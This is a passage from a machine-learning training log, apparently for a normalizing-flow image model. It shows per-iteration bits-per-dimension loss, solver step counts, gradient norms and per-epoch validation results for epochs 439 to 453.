10.00(10.00)\nIter 5045 | Time 39.9685(40.3063) | Bit/dim 1.0748(1.0771) | Xent 0.0000(0.0000) | Loss 1.0748(1.0771) | Error 0.0000(0.0000) Steps 440(441.93) | Grad Norm 0.0688(0.0816) | Total Time 10.00(10.00)\nIter 5046 | Time 39.6875(40.2877) | Bit/dim 1.0822(1.0773) | Xent 0.0000(0.0000) | Loss 1.0822(1.0773) | Error 0.0000(0.0000) Steps 446(442.06) | Grad Norm 0.0655(0.0811) | Total Time 10.00(10.00)\nIter 5047 | Time 39.7585(40.2718) | Bit/dim 1.0799(1.0774) | Xent 0.0000(0.0000) | Loss 1.0799(1.0774) | Error 0.0000(0.0000) Steps 440(441.99) | Grad Norm 0.0768(0.0810) | Total Time 10.00(10.00)\nIter 5048 | Time 40.3894(40.2753) | Bit/dim 1.0739(1.0773) | Xent 0.0000(0.0000) | Loss 1.0739(1.0773) | Error 0.0000(0.0000) Steps 440(441.93) | Grad Norm 0.0585(0.0803) | Total Time 10.00(10.00)\nIter 5049 | Time 40.2821(40.2756) | Bit/dim 1.0777(1.0773) | Xent 0.0000(0.0000) | Loss 1.0777(1.0773) | Error 0.0000(0.0000) Steps 440(441.88) | Grad Norm 0.0847(0.0804) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0439 | Time 14.9688, Epoch Time 307.8355(310.1465), Bit/dim 1.0719(best: 1.0719), Xent 0.0000, Loss 1.0719, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5050 | Time 39.2756(40.2456) | Bit/dim 1.0772(1.0773) | Xent 0.0000(0.0000) | Loss 1.0772(1.0773) | Error 0.0000(0.0000) Steps 446(442.00) | Grad Norm 0.0615(0.0799) | Total Time 10.00(10.00)\nIter 5051 | Time 39.8175(40.2327) | Bit/dim 1.0757(1.0772) | Xent 0.0000(0.0000) | Loss 1.0757(1.0772) | Error 0.0000(0.0000) Steps 440(441.94) | Grad Norm 0.0688(0.0795) | Total Time 10.00(10.00)\nIter 5052 | Time 41.8110(40.2801) | Bit/dim 1.0787(1.0773) | Xent 0.0000(0.0000) | Loss 1.0787(1.0773) | Error 0.0000(0.0000) Steps 440(441.88) | Grad Norm 0.0694(0.0792) | Total Time 10.00(10.00)\nIter 5053 | Time 40.8224(40.2963) | Bit/dim 1.0765(1.0772) | Xent 0.0000(0.0000) | Loss 1.0765(1.0772) | Error 0.0000(0.0000) Steps 440(441.82) | Grad Norm 0.0736(0.0791) | Total Time 10.00(10.00)\nIter 5054 | Time 40.2548(40.2951) | Bit/dim 1.0756(1.0772) | Xent 0.0000(0.0000) | Loss 1.0756(1.0772) | Error 0.0000(0.0000) Steps 440(441.77) | Grad Norm 0.0655(0.0786) | Total Time 10.00(10.00)\nIter 5055 | Time 40.3210(40.2959) | Bit/dim 1.0784(1.0772) | Xent 0.0000(0.0000) | Loss 1.0784(1.0772) | Error 0.0000(0.0000) Steps 440(441.72) | Grad Norm 0.0966(0.0792) | Total Time 10.00(10.00)\nIter 5056 | Time 38.9042(40.2541) | Bit/dim 1.0775(1.0772) | Xent 0.0000(0.0000) | Loss 1.0775(1.0772) | Error 0.0000(0.0000) Steps 440(441.67) | Grad Norm 0.0977(0.0797) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0440 | Time 14.9726, Epoch Time 308.6790(310.1024), Bit/dim 1.0716(best: 1.0719), Xent 0.0000, Loss 1.0716, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5057 | Time 39.5420(40.2327) | Bit/dim 1.0732(1.0771) | Xent 0.0000(0.0000) | Loss 1.0732(1.0771) | Error 0.0000(0.0000) Steps 446(441.80) | Grad Norm 0.0828(0.0798) | Total Time 10.00(10.00)\nIter 5058 | Time 38.9610(40.1946) | Bit/dim 1.0758(1.0771) | Xent 0.0000(0.0000) | Loss 1.0758(1.0771) | Error 0.0000(0.0000) Steps 440(441.74) | Grad Norm 0.1000(0.0804) | Total Time 10.00(10.00)\nIter 5059 | Time 41.8792(40.2451) | Bit/dim 1.0835(1.0773) | Xent 0.0000(0.0000) | Loss 1.0835(1.0773) | Error 0.0000(0.0000) Steps 446(441.87) | Grad Norm 0.0772(0.0803) | Total Time 10.00(10.00)\nIter 5060 | Time 39.0249(40.2085) | Bit/dim 1.0778(1.0773) | Xent 0.0000(0.0000) | Loss 1.0778(1.0773) | Error 0.0000(0.0000) Steps 440(441.81) | Grad Norm 0.0989(0.0809) | Total Time 10.00(10.00)\nIter 5061 | Time 40.3024(40.2113) | Bit/dim 1.0738(1.0772) | Xent 0.0000(0.0000) | Loss 1.0738(1.0772) | Error 0.0000(0.0000) Steps 440(441.76) | Grad Norm 0.0728(0.0807) | Total Time 10.00(10.00)\nIter 5062 | Time 40.4513(40.2185) | Bit/dim 1.0754(1.0771) | Xent 0.0000(0.0000) | Loss 1.0754(1.0771) | Error 0.0000(0.0000) Steps 446(441.89) | Grad Norm 0.0566(0.0799) | Total Time 10.00(10.00)\nIter 5063 | Time 39.5264(40.1978) | Bit/dim 1.0788(1.0772) | Xent 0.0000(0.0000) | Loss 1.0788(1.0772) | Error 0.0000(0.0000) Steps 440(441.83) | Grad Norm 0.0690(0.0796) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0441 | Time 14.9985, Epoch Time 307.2936(310.0182), Bit/dim 1.0715(best: 1.0716), Xent 0.0000, Loss 1.0715, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5064 | Time 40.3287(40.2017) | Bit/dim 1.0829(1.0774) | Xent 0.0000(0.0000) | Loss 1.0829(1.0774) | Error 0.0000(0.0000) Steps 446(441.95) | Grad Norm 0.0663(0.0792) | Total Time 10.00(10.00)\nIter 5065 | Time 40.7226(40.2173) | Bit/dim 1.0784(1.0774) | Xent 0.0000(0.0000) | Loss 1.0784(1.0774) | Error 0.0000(0.0000) Steps 440(441.90) | Grad Norm 0.0663(0.0788) | Total Time 10.00(10.00)\nIter 5066 | Time 39.0119(40.1812) | Bit/dim 1.0798(1.0775) | Xent 0.0000(0.0000) | Loss 1.0798(1.0775) | Error 0.0000(0.0000) Steps 440(441.84) | Grad Norm 0.0713(0.0786) | Total Time 10.00(10.00)\nIter 5067 | Time 41.0093(40.2060) | Bit/dim 1.0716(1.0773) | Xent 0.0000(0.0000) | Loss 1.0716(1.0773) | Error 0.0000(0.0000) Steps 440(441.78) | Grad Norm 0.0552(0.0779) | Total Time 10.00(10.00)\nIter 5068 | Time 40.3178(40.2094) | Bit/dim 1.0725(1.0771) | Xent 0.0000(0.0000) | Loss 1.0725(1.0771) | Error 0.0000(0.0000) Steps 440(441.73) | Grad Norm 0.0703(0.0777) | Total Time 10.00(10.00)\nIter 5069 | Time 40.0454(40.2044) | Bit/dim 1.0793(1.0772) | Xent 0.0000(0.0000) | Loss 1.0793(1.0772) | Error 0.0000(0.0000) Steps 440(441.68) | Grad Norm 0.0690(0.0774) | Total Time 10.00(10.00)\nIter 5070 | Time 38.9200(40.1659) | Bit/dim 1.0756(1.0772) | Xent 0.0000(0.0000) | Loss 1.0756(1.0772) | Error 0.0000(0.0000) Steps 440(441.63) | Grad Norm 0.0769(0.0774) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0442 | Time 14.8554, Epoch Time 307.4746(309.9419), Bit/dim 1.0720(best: 1.0715), Xent 0.0000, Loss 1.0720, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5071 | Time 39.7402(40.1531) | Bit/dim 1.0765(1.0771) | Xent 0.0000(0.0000) | Loss 1.0765(1.0771) | Error 0.0000(0.0000) Steps 446(441.76) | Grad Norm 0.0743(0.0773) | Total Time 10.00(10.00)\nIter 5072 | Time 43.0599(40.2403) | Bit/dim 1.0744(1.0771) | Xent 0.0000(0.0000) | Loss 1.0744(1.0771) | Error 0.0000(0.0000) Steps 446(441.89) | Grad Norm 0.0784(0.0773) | Total Time 10.00(10.00)\nIter 5073 | Time 41.5134(40.2785) | Bit/dim 1.0740(1.0770) | Xent 0.0000(0.0000) | Loss 1.0740(1.0770) | Error 0.0000(0.0000) Steps 440(441.83) | Grad Norm 0.0575(0.0767) | Total Time 10.00(10.00)\nIter 5074 | Time 39.1179(40.2437) | Bit/dim 1.0754(1.0769) | Xent 0.0000(0.0000) | Loss 1.0754(1.0769) | Error 0.0000(0.0000) Steps 446(441.96) | Grad Norm 0.1322(0.0784) | Total Time 10.00(10.00)\nIter 5075 | Time 38.7283(40.1983) | Bit/dim 1.0754(1.0769) | Xent 0.0000(0.0000) | Loss 1.0754(1.0769) | Error 0.0000(0.0000) Steps 440(441.90) | Grad Norm 0.0586(0.0778) | Total Time 10.00(10.00)\nIter 5076 | Time 40.6963(40.2132) | Bit/dim 1.0831(1.0771) | Xent 0.0000(0.0000) | Loss 1.0831(1.0771) | Error 0.0000(0.0000) Steps 446(442.02) | Grad Norm 0.0796(0.0779) | Total Time 10.00(10.00)\nIter 5077 | Time 40.2723(40.2150) | Bit/dim 1.0743(1.0770) | Xent 0.0000(0.0000) | Loss 1.0743(1.0770) | Error 0.0000(0.0000) Steps 446(442.14) | Grad Norm 0.0723(0.0777) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0443 | Time 14.8202, Epoch Time 310.3533(309.9542), Bit/dim 1.0715(best: 1.0715), Xent 0.0000, Loss 1.0715, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5078 | Time 41.0753(40.2408) | Bit/dim 1.0761(1.0769) | Xent 0.0000(0.0000) | Loss 1.0761(1.0769) | Error 0.0000(0.0000) Steps 440(442.07) | Grad Norm 0.0579(0.0771) | Total Time 10.00(10.00)\nIter 5079 | Time 40.8736(40.2598) | Bit/dim 1.0781(1.0770) | Xent 0.0000(0.0000) | Loss 1.0781(1.0770) | Error 0.0000(0.0000) Steps 440(442.01) | Grad Norm 0.0566(0.0765) | Total Time 10.00(10.00)\nIter 5080 | Time 39.0060(40.2221) | Bit/dim 1.0783(1.0770) | Xent 0.0000(0.0000) | Loss 1.0783(1.0770) | Error 0.0000(0.0000) Steps 440(441.95) | Grad Norm 0.0733(0.0764) | Total Time 10.00(10.00)\nIter 5081 | Time 39.4570(40.1992) | Bit/dim 1.0752(1.0770) | Xent 0.0000(0.0000) | Loss 1.0752(1.0770) | Error 0.0000(0.0000) Steps 440(441.89) | Grad Norm 0.0641(0.0760) | Total Time 10.00(10.00)\nIter 5082 | Time 41.5312(40.2392) | Bit/dim 1.0790(1.0770) | Xent 0.0000(0.0000) | Loss 1.0790(1.0770) | Error 0.0000(0.0000) Steps 446(442.02) | Grad Norm 0.0600(0.0755) | Total Time 10.00(10.00)\nIter 5083 | Time 41.7705(40.2851) | Bit/dim 1.0769(1.0770) | Xent 0.0000(0.0000) | Loss 1.0769(1.0770) | Error 0.0000(0.0000) Steps 440(441.96) | Grad Norm 0.0881(0.0759) | Total Time 10.00(10.00)\nIter 5084 | Time 39.4931(40.2613) | Bit/dim 1.0731(1.0769) | Xent 0.0000(0.0000) | Loss 1.0731(1.0769) | Error 0.0000(0.0000) Steps 446(442.08) | Grad Norm 0.0640(0.0756) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0444 | Time 14.8996, Epoch Time 310.4499(309.9691), Bit/dim 1.0720(best: 1.0715), Xent 0.0000, Loss 1.0720, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5085 | Time 41.2615(40.2913) | Bit/dim 1.0759(1.0769) | Xent 0.0000(0.0000) | Loss 1.0759(1.0769) | Error 0.0000(0.0000) Steps 446(442.20) | Grad Norm 0.0717(0.0754) | Total Time 10.00(10.00)\nIter 5086 | Time 41.8669(40.3386) | Bit/dim 1.0791(1.0769) | Xent 0.0000(0.0000) | Loss 1.0791(1.0769) | Error 0.0000(0.0000) Steps 440(442.13) | Grad Norm 0.0678(0.0752) | Total Time 10.00(10.00)\nIter 5087 | Time 40.7604(40.3513) | Bit/dim 1.0770(1.0769) | Xent 0.0000(0.0000) | Loss 1.0770(1.0769) | Error 0.0000(0.0000) Steps 440(442.07) | Grad Norm 0.0692(0.0750) | Total Time 10.00(10.00)\nIter 5088 | Time 40.4374(40.3538) | Bit/dim 1.0755(1.0769) | Xent 0.0000(0.0000) | Loss 1.0755(1.0769) | Error 0.0000(0.0000) Steps 440(442.00) | Grad Norm 0.0663(0.0748) | Total Time 10.00(10.00)\nIter 5089 | Time 40.9287(40.3711) | Bit/dim 1.0763(1.0769) | Xent 0.0000(0.0000) | Loss 1.0763(1.0769) | Error 0.0000(0.0000) Steps 440(441.94) | Grad Norm 0.0921(0.0753) | Total Time 10.00(10.00)\nIter 5090 | Time 40.1069(40.3632) | Bit/dim 1.0751(1.0768) | Xent 0.0000(0.0000) | Loss 1.0751(1.0768) | Error 0.0000(0.0000) Steps 440(441.89) | Grad Norm 0.0713(0.0752) | Total Time 10.00(10.00)\nIter 5091 | Time 40.6335(40.3713) | Bit/dim 1.0767(1.0768) | Xent 0.0000(0.0000) | Loss 1.0767(1.0768) | Error 0.0000(0.0000) Steps 440(441.83) | Grad Norm 0.0569(0.0746) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0445 | Time 14.7990, Epoch Time 313.2543(310.0676), Bit/dim 1.0715(best: 1.0715), Xent 0.0000, Loss 1.0715, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5092 | Time 41.2545(40.3978) | Bit/dim 1.0796(1.0769) | Xent 0.0000(0.0000) | Loss 1.0796(1.0769) | Error 0.0000(0.0000) Steps 446(441.95) | Grad Norm 0.0542(0.0740) | Total Time 10.00(10.00)\nIter 5093 | Time 40.5972(40.4038) | Bit/dim 1.0754(1.0769) | Xent 0.0000(0.0000) | Loss 1.0754(1.0769) | Error 0.0000(0.0000) Steps 440(441.90) | Grad Norm 0.0940(0.0746) | Total Time 10.00(10.00)\nIter 5094 | Time 41.3206(40.4313) | Bit/dim 1.0756(1.0768) | Xent 0.0000(0.0000) | Loss 1.0756(1.0768) | Error 0.0000(0.0000) Steps 440(441.84) | Grad Norm 0.0801(0.0748) | Total Time 10.00(10.00)\nIter 5095 | Time 41.0053(40.4485) | Bit/dim 1.0752(1.0768) | Xent 0.0000(0.0000) | Loss 1.0752(1.0768) | Error 0.0000(0.0000) Steps 446(441.96) | Grad Norm 0.0665(0.0745) | Total Time 10.00(10.00)\nIter 5096 | Time 41.6199(40.4836) | Bit/dim 1.0806(1.0769) | Xent 0.0000(0.0000) | Loss 1.0806(1.0769) | Error 0.0000(0.0000) Steps 446(442.08) | Grad Norm 0.0867(0.0749) | Total Time 10.00(10.00)\nIter 5097 | Time 40.5252(40.4849) | Bit/dim 1.0728(1.0768) | Xent 0.0000(0.0000) | Loss 1.0728(1.0768) | Error 0.0000(0.0000) Steps 440(442.02) | Grad Norm 0.1213(0.0763) | Total Time 10.00(10.00)\nIter 5098 | Time 39.8950(40.4672) | Bit/dim 1.0755(1.0767) | Xent 0.0000(0.0000) | Loss 1.0755(1.0767) | Error 0.0000(0.0000) Steps 440(441.96) | Grad Norm 0.0860(0.0766) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0446 | Time 14.7623, Epoch Time 313.7080(310.1768), Bit/dim 1.0719(best: 1.0715), Xent 0.0000, Loss 1.0719, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5099 | Time 40.7655(40.4761) | Bit/dim 1.0804(1.0768) | Xent 0.0000(0.0000) | Loss 1.0804(1.0768) | Error 0.0000(0.0000) Steps 446(442.08) | Grad Norm 0.0476(0.0757) | Total Time 10.00(10.00)\nIter 5100 | Time 42.1693(40.5269) | Bit/dim 1.0750(1.0768) | Xent 0.0000(0.0000) | Loss 1.0750(1.0768) | Error 0.0000(0.0000) Steps 440(442.02) | Grad Norm 0.0876(0.0761) | Total Time 10.00(10.00)\nIter 5101 | Time 40.0760(40.5134) | Bit/dim 1.0792(1.0769) | Xent 0.0000(0.0000) | Loss 1.0792(1.0769) | Error 0.0000(0.0000) Steps 446(442.14) | Grad Norm 0.0873(0.0764) | Total Time 10.00(10.00)\nIter 5102 | Time 41.4436(40.5413) | Bit/dim 1.0787(1.0769) | Xent 0.0000(0.0000) | Loss 1.0787(1.0769) | Error 0.0000(0.0000) Steps 440(442.07) | Grad Norm 0.0593(0.0759) | Total Time 10.00(10.00)\nIter 5103 | Time 40.9364(40.5532) | Bit/dim 1.0777(1.0769) | Xent 0.0000(0.0000) | Loss 1.0777(1.0769) | Error 0.0000(0.0000) Steps 446(442.19) | Grad Norm 0.0713(0.0758) | Total Time 10.00(10.00)\nIter 5104 | Time 40.3442(40.5469) | Bit/dim 1.0759(1.0769) | Xent 0.0000(0.0000) | Loss 1.0759(1.0769) | Error 0.0000(0.0000) Steps 446(442.31) | Grad Norm 0.0552(0.0751) | Total Time 10.00(10.00)\nIter 5105 | Time 41.1519(40.5650) | Bit/dim 1.0746(1.0768) | Xent 0.0000(0.0000) | Loss 1.0746(1.0768) | Error 0.0000(0.0000) Steps 446(442.42) | Grad Norm 0.0624(0.0748) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0447 | Time 14.7920, Epoch Time 314.3384(310.3017), Bit/dim 1.0712(best: 1.0715), Xent 0.0000, Loss 1.0712, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5106 | Time 40.8066(40.5723) | Bit/dim 1.0764(1.0768) | Xent 0.0000(0.0000) | Loss 1.0764(1.0768) | Error 0.0000(0.0000) Steps 440(442.35) | Grad Norm 0.0736(0.0747) | Total Time 10.00(10.00)\nIter 5107 | Time 38.9329(40.5231) | Bit/dim 1.0790(1.0769) | Xent 0.0000(0.0000) | Loss 1.0790(1.0769) | Error 0.0000(0.0000) Steps 440(442.27) | Grad Norm 0.0808(0.0749) | Total Time 10.00(10.00)\nIter 5108 | Time 39.5545(40.4940) | Bit/dim 1.0752(1.0768) | Xent 0.0000(0.0000) | Loss 1.0752(1.0768) | Error 0.0000(0.0000) Steps 440(442.21) | Grad Norm 0.0852(0.0752) | Total Time 10.00(10.00)\nIter 5109 | Time 38.5498(40.4357) | Bit/dim 1.0757(1.0768) | Xent 0.0000(0.0000) | Loss 1.0757(1.0768) | Error 0.0000(0.0000) Steps 440(442.14) | Grad Norm 0.0663(0.0749) | Total Time 10.00(10.00)\nIter 5110 | Time 41.0553(40.4543) | Bit/dim 1.0741(1.0767) | Xent 0.0000(0.0000) | Loss 1.0741(1.0767) | Error 0.0000(0.0000) Steps 440(442.08) | Grad Norm 0.0604(0.0745) | Total Time 10.00(10.00)\nIter 5111 | Time 39.3435(40.4210) | Bit/dim 1.0788(1.0768) | Xent 0.0000(0.0000) | Loss 1.0788(1.0768) | Error 0.0000(0.0000) Steps 440(442.01) | Grad Norm 0.0671(0.0743) | Total Time 10.00(10.00)\nIter 5112 | Time 40.1205(40.4120) | Bit/dim 1.0789(1.0769) | Xent 0.0000(0.0000) | Loss 1.0789(1.0769) | Error 0.0000(0.0000) Steps 440(441.95) | Grad Norm 0.0950(0.0749) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0448 | Time 14.7011, Epoch Time 305.5031(310.1577), Bit/dim 1.0712(best: 1.0712), Xent 0.0000, Loss 1.0712, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5113 | Time 40.9361(40.4277) | Bit/dim 1.0789(1.0769) | Xent 0.0000(0.0000) | Loss 1.0789(1.0769) | Error 0.0000(0.0000) Steps 446(442.07) | Grad Norm 0.0622(0.0745) | Total Time 10.00(10.00)\nIter 5114 | Time 39.8053(40.4090) | Bit/dim 1.0795(1.0770) | Xent 0.0000(0.0000) | Loss 1.0795(1.0770) | Error 0.0000(0.0000) Steps 440(442.01) | Grad Norm 0.1130(0.0757) | Total Time 10.00(10.00)\nIter 5115 | Time 39.0936(40.3696) | Bit/dim 1.0738(1.0769) | Xent 0.0000(0.0000) | Loss 1.0738(1.0769) | Error 0.0000(0.0000) Steps 440(441.95) | Grad Norm 0.0774(0.0757) | Total Time 10.00(10.00)\nIter 5116 | Time 39.0391(40.3296) | Bit/dim 1.0762(1.0769) | Xent 0.0000(0.0000) | Loss 1.0762(1.0769) | Error 0.0000(0.0000) Steps 440(441.89) | Grad Norm 0.1001(0.0765) | Total Time 10.00(10.00)\nIter 5117 | Time 39.1018(40.2928) | Bit/dim 1.0773(1.0769) | Xent 0.0000(0.0000) | Loss 1.0773(1.0769) | Error 0.0000(0.0000) Steps 440(441.84) | Grad Norm 0.0843(0.0767) | Total Time 10.00(10.00)\nIter 5118 | Time 39.5423(40.2703) | Bit/dim 1.0744(1.0768) | Xent 0.0000(0.0000) | Loss 1.0744(1.0768) | Error 0.0000(0.0000) Steps 446(441.96) | Grad Norm 0.0697(0.0765) | Total Time 10.00(10.00)\nIter 5119 | Time 40.3796(40.2736) | Bit/dim 1.0778(1.0768) | Xent 0.0000(0.0000) | Loss 1.0778(1.0768) | Error 0.0000(0.0000) Steps 446(442.08) | Grad Norm 0.0560(0.0759) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0449 | Time 14.7723, Epoch Time 305.2510(310.0105), Bit/dim 1.0712(best: 1.0712), Xent 0.0000, Loss 1.0712, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5120 | Time 41.8439(40.3207) | Bit/dim 1.0760(1.0768) | Xent 0.0000(0.0000) | Loss 1.0760(1.0768) | Error 0.0000(0.0000) Steps 440(442.02) | Grad Norm 0.0648(0.0755) | Total Time 10.00(10.00)\nIter 5121 | Time 38.6951(40.2719) | Bit/dim 1.0796(1.0769) | Xent 0.0000(0.0000) | Loss 1.0796(1.0769) | Error 0.0000(0.0000) Steps 440(441.96) | Grad Norm 0.0640(0.0752) | Total Time 10.00(10.00)\nIter 5122 | Time 40.2275(40.2706) | Bit/dim 1.0806(1.0770) | Xent 0.0000(0.0000) | Loss 1.0806(1.0770) | Error 0.0000(0.0000) Steps 440(441.90) | Grad Norm 0.0861(0.0755) | Total Time 10.00(10.00)\nIter 5123 | Time 41.1099(40.2958) | Bit/dim 1.0732(1.0769) | Xent 0.0000(0.0000) | Loss 1.0732(1.0769) | Error 0.0000(0.0000) Steps 440(441.84) | Grad Norm 0.0629(0.0751) | Total Time 10.00(10.00)\nIter 5124 | Time 40.4925(40.3017) | Bit/dim 1.0707(1.0767) | Xent 0.0000(0.0000) | Loss 1.0707(1.0767) | Error 0.0000(0.0000) Steps 446(441.97) | Grad Norm 0.0687(0.0749) | Total Time 10.00(10.00)\nIter 5125 | Time 40.6290(40.3115) | Bit/dim 1.0777(1.0767) | Xent 0.0000(0.0000) | Loss 1.0777(1.0767) | Error 0.0000(0.0000) Steps 440(441.91) | Grad Norm 0.0769(0.0750) | Total Time 10.00(10.00)\nIter 5126 | Time 40.6238(40.3209) | Bit/dim 1.0805(1.0769) | Xent 0.0000(0.0000) | Loss 1.0805(1.0769) | Error 0.0000(0.0000) Steps 440(441.85) | Grad Norm 0.0966(0.0757) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0450 | Time 14.8414, Epoch Time 310.9020(310.0373), Bit/dim 1.0718(best: 1.0712), Xent 0.0000, Loss 1.0718, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5127 | Time 41.0953(40.3441) | Bit/dim 1.0824(1.0770) | Xent 0.0000(0.0000) | Loss 1.0824(1.0770) | Error 0.0000(0.0000) Steps 440(441.80) | Grad Norm 0.0609(0.0752) | Total Time 10.00(10.00)\nIter 5128 | Time 41.3729(40.3750) | Bit/dim 1.0741(1.0769) | Xent 0.0000(0.0000) | Loss 1.0741(1.0769) | Error 0.0000(0.0000) Steps 446(441.92) | Grad Norm 0.0989(0.0759) | Total Time 10.00(10.00)\nIter 5129 | Time 42.5628(40.4406) | Bit/dim 1.0753(1.0769) | Xent 0.0000(0.0000) | Loss 1.0753(1.0769) | Error 0.0000(0.0000) Steps 446(442.05) | Grad Norm 0.1062(0.0768) | Total Time 10.00(10.00)\nIter 5130 | Time 40.2631(40.4353) | Bit/dim 1.0744(1.0768) | Xent 0.0000(0.0000) | Loss 1.0744(1.0768) | Error 0.0000(0.0000) Steps 446(442.16) | Grad Norm 0.0830(0.0770) | Total Time 10.00(10.00)\nIter 5131 | Time 41.3110(40.4615) | Bit/dim 1.0770(1.0768) | Xent 0.0000(0.0000) | Loss 1.0770(1.0768) | Error 0.0000(0.0000) Steps 440(442.10) | Grad Norm 0.1329(0.0787) | Total Time 10.00(10.00)\nIter 5132 | Time 41.3311(40.4876) | Bit/dim 1.0786(1.0769) | Xent 0.0000(0.0000) | Loss 1.0786(1.0769) | Error 0.0000(0.0000) Steps 440(442.04) | Grad Norm 0.0897(0.0790) | Total Time 10.00(10.00)\nIter 5133 | Time 39.2706(40.4511) | Bit/dim 1.0751(1.0768) | Xent 0.0000(0.0000) | Loss 1.0751(1.0768) | Error 0.0000(0.0000) Steps 440(441.97) | Grad Norm 0.1245(0.0804) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0451 | Time 14.6837, Epoch Time 314.4093(310.1684), Bit/dim 1.0717(best: 1.0712), Xent 0.0000, Loss 1.0717, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5134 | Time 39.4738(40.4218) | Bit/dim 1.0767(1.0768) | Xent 0.0000(0.0000) | Loss 1.0767(1.0768) | Error 0.0000(0.0000) Steps 440(441.92) | Grad Norm 0.0642(0.0799) | Total Time 10.00(10.00)\nIter 5135 | Time 39.5516(40.3957) | Bit/dim 1.0718(1.0767) | Xent 0.0000(0.0000) | Loss 1.0718(1.0767) | Error 0.0000(0.0000) Steps 446(442.04) | Grad Norm 0.0804(0.0799) | Total Time 10.00(10.00)\nIter 5136 | Time 40.5634(40.4007) | Bit/dim 1.0782(1.0767) | Xent 0.0000(0.0000) | Loss 1.0782(1.0767) | Error 0.0000(0.0000) Steps 440(441.98) | Grad Norm 0.0900(0.0802) | Total Time 10.00(10.00)\nIter 5137 | Time 40.1988(40.3947) | Bit/dim 1.0805(1.0768) | Xent 0.0000(0.0000) | Loss 1.0805(1.0768) | Error 0.0000(0.0000) Steps 446(442.10) | Grad Norm 0.0873(0.0804) | Total Time 10.00(10.00)\nIter 5138 | Time 40.0656(40.3848) | Bit/dim 1.0767(1.0768) | Xent 0.0000(0.0000) | Loss 1.0767(1.0768) | Error 0.0000(0.0000) Steps 440(442.03) | Grad Norm 0.1066(0.0812) | Total Time 10.00(10.00)\nIter 5139 | Time 38.7939(40.3371) | Bit/dim 1.0754(1.0768) | Xent 0.0000(0.0000) | Loss 1.0754(1.0768) | Error 0.0000(0.0000) Steps 440(441.97) | Grad Norm 0.0649(0.0807) | Total Time 10.00(10.00)\nIter 5140 | Time 40.7899(40.3506) | Bit/dim 1.0759(1.0768) | Xent 0.0000(0.0000) | Loss 1.0759(1.0768) | Error 0.0000(0.0000) Steps 446(442.09) | Grad Norm 0.0786(0.0807) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0452 | Time 14.9141, Epoch Time 307.2762(310.0817), Bit/dim 1.0718(best: 1.0712), Xent 0.0000, Loss 1.0718, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5141 | Time 40.9957(40.3700) | Bit/dim 1.0759(1.0767) | Xent 0.0000(0.0000) | Loss 1.0759(1.0767) | Error 0.0000(0.0000) Steps 446(442.21) | Grad Norm 0.1147(0.0817) | Total Time 10.00(10.00)\nIter 5142 | Time 40.2770(40.3672) | Bit/dim 1.0737(1.0766) | Xent 0.0000(0.0000) | Loss 1.0737(1.0766) | Error 0.0000(0.0000) Steps 440(442.15) | Grad Norm 0.0986(0.0822) | Total Time 10.00(10.00)\nIter 5143 | Time 41.5301(40.4021) | Bit/dim 1.0772(1.0766) | Xent 0.0000(0.0000) | Loss 1.0772(1.0766) | Error 0.0000(0.0000) Steps 440(442.08) | Grad Norm 0.0624(0.0816) | Total Time 10.00(10.00)\nIter 5144 | Time 40.6513(40.4096) | Bit/dim 1.0770(1.0767) | Xent 0.0000(0.0000) | Loss 1.0770(1.0767) | Error 0.0000(0.0000) Steps 446(442.20) | Grad Norm 0.0702(0.0813) | Total Time 10.00(10.00)\nIter 5145 | Time 41.7376(40.4494) | Bit/dim 1.0780(1.0767) | Xent 0.0000(0.0000) | Loss 1.0780(1.0767) | Error 0.0000(0.0000) Steps 440(442.13) | Grad Norm 0.0911(0.0816) | Total Time 10.00(10.00)\nIter 5146 | Time 39.9169(40.4334) | Bit/dim 1.0766(1.0767) | Xent 0.0000(0.0000) | Loss 1.0766(1.0767) | Error 0.0000(0.0000) Steps 440(442.07) | Grad Norm 0.0825(0.0816) | Total Time 10.00(10.00)\nIter 5147 | Time 40.4454(40.4338) | Bit/dim 1.0798(1.0768) | Xent 0.0000(0.0000) | Loss 1.0798(1.0768) | Error 0.0000(0.0000) Steps 440(442.01) | Grad Norm 0.0645(0.0811) | Total Time 10.00(10.00)\nvalidating...\nEpoch 0453 | Time 15.0143, Epoch Time 313.3263(310.1790), Bit/dim 1.0712(best: 1.0712), Xent 0.0000, Loss 1.0712, Error 1.0000(best: inf)\n===> Using batch size 8000. Total 7 iterations/epoch.\nIter 5148 | Time 41.1612(40.4556) | Bit/dim 1.0745(1.0767) | Xent 0.0000(0.0000) | Loss 1.0745(1.0767) | Error 0.0000(0.0000) Steps 446(442.13) | Grad Norm 0.0597(0.0804) | Total Time 10.00(10.00)\nIter 5149 | Time 39.4420(40.4252) | Bit/dim 1.0783(1.0768) | Xent 0.0000(0.0000) | Loss 1.0783(1.0768) | Error 0.0000(0.0000) Steps 